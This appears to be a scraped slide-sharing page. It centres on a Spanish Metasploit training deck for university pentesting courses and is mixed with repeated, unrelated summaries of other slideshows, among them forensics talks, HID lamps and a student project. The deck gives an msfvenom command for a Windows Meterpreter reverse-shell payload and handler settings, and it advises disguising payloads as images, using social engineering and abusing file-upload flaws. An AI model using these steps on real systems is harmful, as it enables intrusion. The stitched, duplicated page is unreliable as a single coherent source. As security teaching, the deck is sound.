Este documento describe el uso del Metasploit Framework para realizar pruebas de intrusión. Explica brevemente los tipos de hackers, la arquitectura de Metasploit, y cómo usar módulos como exploits, payloads y codificadores para comprometer sistemas mediante ataques de reversa shell y subida de archivos maliciosos. También cubre contramedidas como actualizaciones y antivirus.
Presentació a càrrec de Jordi Guijarro, cap d'Operacions i Seguretat del CSUC, duta a terme dins la celebració de la 7a edició del SIG-NOC Meeting (19-20 d'abril de 2018).
En concret, la presentació presenta l'aplicació CSIRT-Kit, útil en la construcció d'un Equip de Resposta a Incidents de Seguretat (CSIRT, Computer Security Incident Response Team), ja que ofereix una col·lecció d'eines plug&play per proporcionar els primers passos a seguir per als nous equips de tractament d'incidents.
So you think the systems at your employer can actually use a little bit more security? Or what about your own system to gain more privacy? In this talk, we discuss the reasons for Linux server and system hardening. First we learn why we should protect our crown jewels, and what can wrong if we ignore information security. Next is getting a better understanding of the possible resources we can use. And since system hardening can be time-consuming, we discuss some tools to help in the system hardening quest.
Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others. We created and maintain Security
Presentació a càrrec de Jordi Guijarro, cap d'Operacions i Seguretat del CSUC, duta a terme dins la celebració de la 7a edició del SIG-NOC Meeting (19-20 d'abril de 2018).
En concret, la presentació presenta l'aplicació CSIRT-Kit, útil en la construcció d'un Equip de Resposta a Incidents de Seguretat (CSIRT, Computer Security Incident Response Team), ja que ofereix una col·lecció d'eines plug&play per proporcionar els primers passos a seguir per als nous equips de tractament d'incidents.
So you think the systems at your employer can actually use a little bit more security? Or what about your own system to gain more privacy? In this talk, we discuss the reasons for Linux server and system hardening. First we learn why we should protect our crown jewels, and what can wrong if we ignore information security. Next is getting a better understanding of the possible resources we can use. And since system hardening can be time-consuming, we discuss some tools to help in the system hardening quest.
Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others. We created and maintain Security
Relatório de Teste Invasão fícticio, que serviu como prova final da cadeira de Testes de Invasão na Especialização em Segurança da Informação, no Centro Universitário de João Pessoa UNIPÊ - 2014.2
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Telefónica
Documento técnico escrito por Sheila A.Berta (@unapibageek), investigadora de seguridad en ElevenPaths, que explica cómo se pueden usar los exploits EternalRomance & EternalSynergy publicados por ShadowBrokers en sistemas operativos Windows Server 2016. Más info en http://www.elladodelmal.com/2017/07/como-explotar-eternalromance-synergy-en.html
Bilgi sistemlerine yönelik veya bilgi sistemleri kullanılarak işlenen suçlar ve gerçekleştirilen saldırılar bu sistemler üzerinde izler bırakmaktadır. Ayrıca sistem hafızalarında ve ağ üzerinde söz konusu aktivitelere ilişkin canlı analiz ile işlenen suçların izleri gözlenebilmektedir.
Bilgi sistemleri üzerindeki kalıcı ve geçici suç izlerinin elde edilmesi ve analizi için çoğunlukla ticari adli bilişim çözümlerinin kullanılması gerekmektedir. Bunun sebebi incelenecek verilerin çokluğu ve bu büyüklükteki verilerin manuel yöntemlerle makul bir zaman aralığında incelenememesidir.
Ticari çözümler kullanım kolaylığı sağlayabilmek için pek çok teknik detayı kullanıcılardan gizlemektedirler. Ancak kullanıcıların temel teknik bilgilere sahip olmaması uzmanlıklarının sınırlanmasına ve olası problemlere karşı etkili çözümler geliştirememelerine yol açmaktadır.
Introduction to Linux Privilege Escalation MethodsBishop Fox
So you’ve managed to get a foothold into the web server — now what? Privilege escalation can be an intimidating process for those unfamiliar with Linux systems or advanced penetration testing techniques. Servers are often cluttered with utilities, backups, and files; how do you find your way through to a root shell? Where are the first places an attacker might look for exploitable vulnerabilities? This slide deck will help you learn about common privilege escalation paths on Linux systems, including sticky bits, shell escapes, wildcard injections, and how to identify vulnerable services. Furthermore, it will illustrate several techniques for those looking to improve their security skills, with time for discussion afterward.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaBGA Cyber Security
Ağ haritalama (Enumeration), sızma testi metodolojilerinden biridir. Hedef ile aktif bir bağ oluşturulduğunda ve hedefe saldırıda bulunurken giriş noktasını tespit etmek amacıyla sistemin ağ yapısının detaylı belirlenmesidir:
Açık sistemler ve üzerindeki açık portlar, servisler ve servislerin hangi yazılımın hangi sürümü olduğu bilgileri, ağ girişlerinde bulunan VPN, Firewall, IPS cihazlarının belirlenmesi, sunucu sistemler çalışan işletim sistemlerinin ve versiyonlarının belirlenmesi ve tüm bu bileşenler belirlendikten sonra hedef sisteme ait ağ haritasının çıkartılması Ağ haritalama adımlarında yapılmaktadır.
UNIT-II Initial Response and forensic duplication, Initial Response & Volatile Data Collection from Windows system -Initial Response & Volatile Data Collection from Unix system – Forensic Duplication: Forensic duplication: Forensic Duplicates as Admissible Evidence, Forensic Duplication Tool Requirements, Creating a Forensic. Duplicate/Qualified Forensic Duplicate of a Hard Drive
Relatório de Teste Invasão fícticio, que serviu como prova final da cadeira de Testes de Invasão na Especialização em Segurança da Informação, no Centro Universitário de João Pessoa UNIPÊ - 2014.2
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Telefónica
Documento técnico escrito por Sheila A.Berta (@unapibageek), investigadora de seguridad en ElevenPaths, que explica cómo se pueden usar los exploits EternalRomance & EternalSynergy publicados por ShadowBrokers en sistemas operativos Windows Server 2016. Más info en http://www.elladodelmal.com/2017/07/como-explotar-eternalromance-synergy-en.html
Bilgi sistemlerine yönelik veya bilgi sistemleri kullanılarak işlenen suçlar ve gerçekleştirilen saldırılar bu sistemler üzerinde izler bırakmaktadır. Ayrıca sistem hafızalarında ve ağ üzerinde söz konusu aktivitelere ilişkin canlı analiz ile işlenen suçların izleri gözlenebilmektedir.
Bilgi sistemleri üzerindeki kalıcı ve geçici suç izlerinin elde edilmesi ve analizi için çoğunlukla ticari adli bilişim çözümlerinin kullanılması gerekmektedir. Bunun sebebi incelenecek verilerin çokluğu ve bu büyüklükteki verilerin manuel yöntemlerle makul bir zaman aralığında incelenememesidir.
Ticari çözümler kullanım kolaylığı sağlayabilmek için pek çok teknik detayı kullanıcılardan gizlemektedirler. Ancak kullanıcıların temel teknik bilgilere sahip olmaması uzmanlıklarının sınırlanmasına ve olası problemlere karşı etkili çözümler geliştirememelerine yol açmaktadır.
Introduction to Linux Privilege Escalation MethodsBishop Fox
So you’ve managed to get a foothold into the web server — now what? Privilege escalation can be an intimidating process for those unfamiliar with Linux systems or advanced penetration testing techniques. Servers are often cluttered with utilities, backups, and files; how do you find your way through to a root shell? Where are the first places an attacker might look for exploitable vulnerabilities? This slide deck will help you learn about common privilege escalation paths on Linux systems, including sticky bits, shell escapes, wildcard injections, and how to identify vulnerable services. Furthermore, it will illustrate several techniques for those looking to improve their security skills, with time for discussion afterward.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaBGA Cyber Security
Ağ haritalama (Enumeration), sızma testi metodolojilerinden biridir. Hedef ile aktif bir bağ oluşturulduğunda ve hedefe saldırıda bulunurken giriş noktasını tespit etmek amacıyla sistemin ağ yapısının detaylı belirlenmesidir:
Açık sistemler ve üzerindeki açık portlar, servisler ve servislerin hangi yazılımın hangi sürümü olduğu bilgileri, ağ girişlerinde bulunan VPN, Firewall, IPS cihazlarının belirlenmesi, sunucu sistemler çalışan işletim sistemlerinin ve versiyonlarının belirlenmesi ve tüm bu bileşenler belirlendikten sonra hedef sisteme ait ağ haritasının çıkartılması Ağ haritalama adımlarında yapılmaktadır.
UNIT-II Initial Response and forensic duplication, Initial Response & Volatile Data Collection from Windows system -Initial Response & Volatile Data Collection from Unix system – Forensic Duplication: Forensic duplication: Forensic Duplicates as Admissible Evidence, Forensic Duplication Tool Requirements, Creating a Forensic. Duplicate/Qualified Forensic Duplicate of a Hard Drive
Curso de Metasploit Framework creado para impartir formación en el Curso de Seguridad Avanzada de la Universitat Jaume I de Castellón (UJI) y para el módulo de PenTesting del Curso de Auditorías Informáticas de la Universitat Politécnica de Valencia (UPV).
Curso de Metasploit Framework creado para impartir formación en el Curso de Seguridad Avanzada de la Universitat Jaume I de Castellón (UJI) y para el módulo de PenTesting del Curso de Auditorías Informáticas de la Universitat Politécnica de Valencia (UPV).
Versión 0.5
Inteligencia Artificial y Ciberseguridad.pdfEmilio Casbas
Recopilación de los puntos más interesantes de diversas presentaciones, desde los visionarios conceptos de Alan Turing, pasando por la paradoja de Hans Moravec y la descripcion de Singularidad de Max Tegmark, hasta los innovadores avances de ChatGPT, y de cómo la IA está transformando la seguridad digital y protegiendo nuestras vidas.
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...espinozaernesto427
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta intensidad son un tipo de lámpara eléctrica de descarga de gas que produce luz por medio de un arco eléctrico entre electrodos de tungsteno alojados dentro de un tubo de alúmina o cuarzo moldeado translúcido o transparente.
lámparas más eficientes del mercado, debido a su menor consumo y por la cantidad de luz que emiten. Adquieren una vida útil de hasta 50.000 horas y no generan calor alguna. Si quieres cambiar la iluminación de tu hogar para hacerla mucho más eficiente, ¡esta es tu mejor opción!
Las nuevas lámparas de descarga de alta intensidad producen más luz visible por unidad de energía eléctrica consumida que las lámparas fluorescentes e incandescentes, ya que una mayor proporción de su radiación es luz visible, en contraste con la infrarroja. Sin embargo, la salida de lúmenes de la iluminación HID puede deteriorarse hasta en un 70% durante 10,000 horas de funcionamiento.
Muchos vehículos modernos usan bombillas HID para los principales sistemas de iluminación, aunque algunas aplicaciones ahora están pasando de bombillas HID a tecnología LED y láser.1 Modelos de lámparas van desde las típicas lámparas de 35 a 100 W de los autos, a las de más de 15 kW que se utilizan en los proyectores de cines IMAX.
Esta tecnología HID no es nueva y fue demostrada por primera vez por Francis Hauksbee en 1705. Lámpara de Nernst.
Lámpara incandescente.
Lámpara de descarga. Lámpara fluorescente. Lámpara fluorescente compacta. Lámpara de haluro metálico. Lámpara de vapor de sodio. Lámpara de vapor de mercurio. Lámpara de neón. Lámpara de deuterio. Lámpara xenón.
Lámpara LED.
Lámpara de plasma.
Flash (fotografía) Las lámparas de descarga de alta intensidad (HID) son un tipo de lámparas de descarga de gas muy utilizadas en la industria de la iluminación. Estas lámparas producen luz creando un arco eléctrico entre dos electrodos a través de un gas ionizado. Las lámparas HID son conocidas por su gran eficacia a la hora de convertir la electricidad en luz y por su larga vida útil.
A diferencia de las luces fluorescentes, que necesitan un recubrimiento de fósforo para emitir luz visible, las lámparas HID no necesitan ningún recubrimiento en el interior de sus tubos. El propio arco eléctrico emite luz visible. Sin embargo, algunas lámparas de halogenuros metálicos y muchas lámparas de vapor de mercurio tienen un recubrimiento de fósforo en el interior de la bombilla para mejorar el espectro luminoso y reproducción cromática. Las lámparas HID están disponibles en varias potencias, que van desde los 25 vatios de las lámparas de halogenuros metálicos autobalastradas y los 35 vatios de las lámparas de vapor de sodio de alta intensidad hasta los 1.000 vatios de las lámparas de vapor de mercurio y vapor de sodio de alta intensidad, e incluso hasta los 1.500 vatios de las lámparas de halogenuros metálicos.
Las lámparas HID requieren un equipo de control especial llamado balasto para funcionar
3Redu: Responsabilidad, Resiliencia y Respetocdraco
¡Hola! Somos 3Redu, conformados por Juan Camilo y Cristian. Entendemos las dificultades que enfrentan muchos estudiantes al tratar de comprender conceptos matemáticos. Nuestro objetivo es brindar una solución inclusiva y accesible para todos.
En este documento analizamos ciertos conceptos relacionados con la ficha 1 y 2. Y concluimos, dando el porque es importante desarrollar nuestras habilidades de pensamiento.
Sara Sofia Bedoya Montezuma.
9-1.
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informáticavazquezgarciajesusma
En este proyecto de investigación nos adentraremos en el fascinante mundo de la intersección entre el arte y los medios de comunicación en el campo de la informática.
La rápida evolución de la tecnología ha llevado a una fusión cada vez más estrecha entre el arte y los medios digitales, generando nuevas formas de expresión y comunicación.
Continuando con el desarrollo de nuestro proyecto haremos uso del método inductivo porque organizamos nuestra investigación a la particular a lo general. El diseño metodológico del trabajo es no experimental y transversal ya que no existe manipulación deliberada de las variables ni de la situación, si no que se observa los fundamental y como se dan en su contestó natural para después analizarlos.
El diseño es transversal porque los datos se recolectan en un solo momento y su propósito es describir variables y analizar su interrelación, solo se desea saber la incidencia y el valor de uno o más variables, el diseño será descriptivo porque se requiere establecer relación entre dos o más de estás.
Mediante una encuesta recopilamos la información de este proyecto los alumnos tengan conocimiento de la evolución del arte y los medios de comunicación en la información y su importancia para la institución.
3. 1. Introducción
- Comprometer sistemas y servicios mediante malware.
- Paso a paso con ejemplos prácticos.
- Demostración práctica.
Sir Francis Bacon. - “El conocimiento es poder”
3
4. 1.1 Introducción Seguridad
-Tipos de hackers:
1) Hacker Sombrero blanco:
- Encontrar vulnerabilidades para reportarlas.
- Actuar bajo permiso.
- No hacer daño.
“El término ‘hacker’ es algo digno de admirar”
Chema Alonso.
4Imagen 1: José María Alonso (CDO Telefónica)
5. 1.1 Introducción Seguridad
-Tipos de hackers:
2) Hacker de sombrero negro:
- Violar el código ético de la seguridad informática.
- Actuar para beneficio propio.
- Causar el mayor daño posible.
“Un fantasma en el sistema”
Kevin Mitnick
5Imagen 2: Kevin Mitnick
6. 1.2 Sistema informático
HARDWARE:
- Necesitaremos hacer uso de la distribución de debian Kali-Linux o
Parrot Security OS.
- Partición de 40GB EXT4y 2GB de SWAP.
- Procesador Quad-Core 64 bits.
¿Porque Kali-Linux o Parrot?
6Imagen 3: Instalación gráfica Live-CD
7. 1.2 Sistema informático
SOFTWARE
- Agregar los repositorios necesarios de Kali.
- Utilizar herramienta “Terminator”.
7Imagen 5: Herramienta Terminator (Kali)
8. 1.3 Introducción Metasploit Framework
● Que es Metasploit Framework.
● Labor que realiza MSF en el pentesting.
● Herramienta de pago o código abierto.
8Imagen 7: Ninja Metasploit (ASCII)
Imagen 6: H.D Moore Autor Metasploit
11. 2.2 Módulos
11Imagen 10: Inicio Metasploit Framework (KALI)
- Exploits: Fragmentos del software.
- Payloads: Carga que se ejecutará en la vulnerabilidad (Meterpreter).
- Nops: Ejecutar el payload satisfactoriamente en la memoria.
- Codificadores: Codificar la firma.
- Auxiliares: Vía de recolección de información.
12. 2.3 Ataques con payloads
12
Imagen 11: Comando msfvenom (KALI)
“MSFVENOM”
- Generador de payloads
- Asociado a una reverse shell
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<TU IP
Address> LPORT=<Tu Puerto> -f <formato> > fichero.*
13. 2.3 Ataques con payloads
METERPRETER
- abreviatura de The Meta-Interpreter.
- Se ejecuta completamente en memoria.
- Controlar el host de un dispositivo mediante VNC.
Imagen 12: Ejecución shell Meterpreter (KALI) 13
14. 2.3 Ataques con payloads
Configurar Payload
- use exploit/multi/handler (Acceso rápido backdoor)
- set lhost <IP>
- set lport <port>
- Run/Exploit (Escucha)
Imagen 13: Configurando payload (KALI) 14
15. 2.3 Ataques con payloads
Ejecución Ataque vía scripting:
- Víctima tiene que ejecutar nuestro payload.
- Camuflar el payload.
- Ingeniería social.
Imagen 17: Ejecutando payload (Atacante) 15
16. 2.3 Ataques con payloads
Ejecución Ataque vía web (PHP):
- Encontrar vulnerabilidad de subida de ficheros.
- Camuflar el payload (jpeg, png, gif).
- Enviar directamente el malware en php.
16
Imagen 15: Vulnerabilidad subida ficheros (Servidor) Imagen 16: Reverse shell (Atacante)
23. 2.5 Contramedidas
Protegernos de un ataque:
- La actualización del sistema operativo y de aquellas aplicaciones más
vulnerables.
- Antivirus que sea capaz de detectar este tipo de scripts maliciosos.
- Monitorizar la red para localizar puertos TCP extraños.
23
Imagen 19: Bitdefender
24. 3. Conclusión
- Ampliación de conocimientos en ciberseguridad.
- Entender la importancia de la herramienta.
- Configuraciones y fallos a lo largo del proyecto.
24